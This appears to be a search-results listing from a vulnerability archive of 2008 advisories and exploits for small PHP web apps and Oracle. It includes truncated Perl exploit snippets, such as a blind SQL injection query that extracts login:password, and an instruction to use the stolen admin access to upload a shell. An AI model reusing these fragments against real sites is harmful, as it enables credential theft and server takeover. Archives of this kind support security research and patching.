21 matches found
PhShoutBox <= 1.5 (final) Insecure Cookie Handling Vulnerability
No description provided by source. --==+================================================================================+==-- --==+ PhShoutBox = 1.5 final Insecure Cookie Handling Arbitrary Authentication +==--...
2532/Gigs <= 1.2.2 - Arbitrary Database Backup/Download Vulnerability
No description provided by source. --==+================================================================================+==-- --==+ 2532|Gigs = 1.2.2 Arbitrary Remote Database Backup/Download +==-- --==+================================================================================+==-- Discover...
Web Calendar <= 4.1 - Blind SQL Injection Exploit
No description provided by source. !/usr/bin/perl use strict; use LWP::Simple; print -+-- Web Calendar = 4.1 Blind SQL Injection Exploit --+-\n; print -+-- --+-\n; print -+-- Discovered && Coded By t0pP8uZz --+-\n; print -+-- Discovered On: 24 April 2008 --+-\n; print -+-- --+-\n; print -+-- Web...
Picture Rating 1.0 - Blind SQL Injection Exploit
No description provided by source. !/usr/bin/perl -- Picture Rating 1.0 Blind SQL Injection Exploit -- -Info/Instructions- After running this perl script, you will have admin details therefore you will be able to login to the admin area at http://site.com/control/ ok once you have logged in has...
Oracle Database Multiple Vulnerabilities (April 2008 CPU)
The remote Oracle database server is missing the April 2008 Critical Patch Update CPU and therefore is potentially affected by security issues in the following components : - Advanced Queuing - Audit - Authentication - Change Data Capture - Core RDBMS - Data Pump - Export - Oracle Enterprise...
Oracle database server multiple security vulnerabilities
CPU for April, 2008 fixes huge number of vulnerabilities...
webcal-sql.txt
!/usr/bin/perl use strict; use LWP::Simple; print "-+-- Web Calendar ; print "\n\nInjecting Please Wait..\n\n" my $lop = 1; my $num = 48; my $sub = 1; my $res = undef; my $content = undef; while$lop $content = get$url."/oneday.php?userid=1 AND ASCIISUBSTRINGSELECT CONCATlogin,char58,password,char...
Web Calendar 4.1 - Blind SQL Injection
Web Calendar 4.1 - Blind SQL Injection !/usr/bin/perl use strict; use LWP::Simple; print "-+-- Web Calendar ; print "\n\nInjecting Please Wait..\n\n" my $lop = 1; my $num = 48; my $sub = 1; my $res = undef; my $content = undef; while$lop $content = get$url."/oneday.php?userid=1 AND...
OpenInvoice 0.9 - Arbitrary Change User Password
OpenInvoice 0.9 - Arbitrary Change User Password !/usr/bin/perl OpenInvoice 0.9 Arbitrary Change User Password Exploit Discovered && Coded By t0pP8uZz Discovered On: 18 April 2008 Vendor has not been notified! see exploit for more details.. Greetz: milw0rm.com, h4ck-y0u.org, CipherCrew! use stric...
[Full-disclosure] Oracle - SQL Injection in package SDO_UTIL [DB05]
Oracle - SQL Injection in package SDOUTIL DB05 Systems Affected 10g Rel. 1, 10g Rel. 2 Severity High Risk Category SQL Injection Vendor URL http://www.oracle.com/ Author Alexander Kornbrust Advisory 16 April 2008 V 1.00 Advisory URL...
CPU Apr 2008
A Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required because of interdependencies by those security patches. Critical Patch Updates are cumulative, except as noted below, but each advisory describes only th...
Prozilla Reviews Script 1.0 Arbitrary Delete User Vulnerability
No description provided by source. --==+================================================================================+==-- --==+ Prozilla Reviews Script 1.0 Arbitrary Delete User Vulnerability +==-- --==+================================================================================+==--...
picturerating-blindsql.txt
!/usr/bin/perl -- Picture Rating 1.0 Blind SQL Injection Exploit -- -Info/Instructions- After running this perl script, you will have admin details therefore you will be able to login to the admin area at http://site.com/control/ ok once you have logged in has admin you can upload a shell, click...
Prozilla Cheat Script 2.0 (id) Remote SQL Injection Vulnerability
No description provided by source. --==+================================================================================+==-- --==+ Prozilla Cheat Script 2.0 SQL Injection Vulnerabilitys +==-- --==+================================================================================+==-- Discovered By...
Prozilla Cheat Script 2.0 - 'id' SQL Injection
--==+================================================================================+==-- --==+ Prozilla Cheat Script 2.0 SQL Injection Vulnerabilitys +==-- --==+================================================================================+==-- Discovered By: t0pP8uZz Discovered On: 7 April...
Software Index 1.1 (cid) Remote SQL Injection Vulnerability
Exploit for unknown platform in category web applications =========================================================== Software Index 1.1 cid Remote SQL Injection Vulnerability ===========================================================...
Gaming Directory 1.0 (cat_id) Remote SQL Injection Vulnerability
No description provided by source. --==+================================================================================+==-- --==+ Gaming Directory 1.0 SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- Discovered By:...
Easynet Forum Host - 'forum.php' SQL Injection
--==+================================================================================+==-- --==+ Easynet Forum Host SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- Discovered By: t0pP8uZz & xprog Discovered On: 5 April...
Picture Rating 1.0 - Blind SQL Injection
!/usr/bin/perl -- Picture Rating 1.0 Blind SQL Injection Exploit -- -Info/Instructions- After running this perl script, you will have admin details therefore you will be able to login to the admin area at http://site.com/control/ ok once you have logged in has admin you can upload a shell, click...
PHP Photo Gallery 1.0 - photo_id SQL Injection
PHP Photo Gallery 1.0 - photoid SQL Injection --==+================================================================================+==-- --==+ PHP Photo Gallery 1.0 SQL Injection Vulnerbilitys +==-- --==+================================================================================+==--...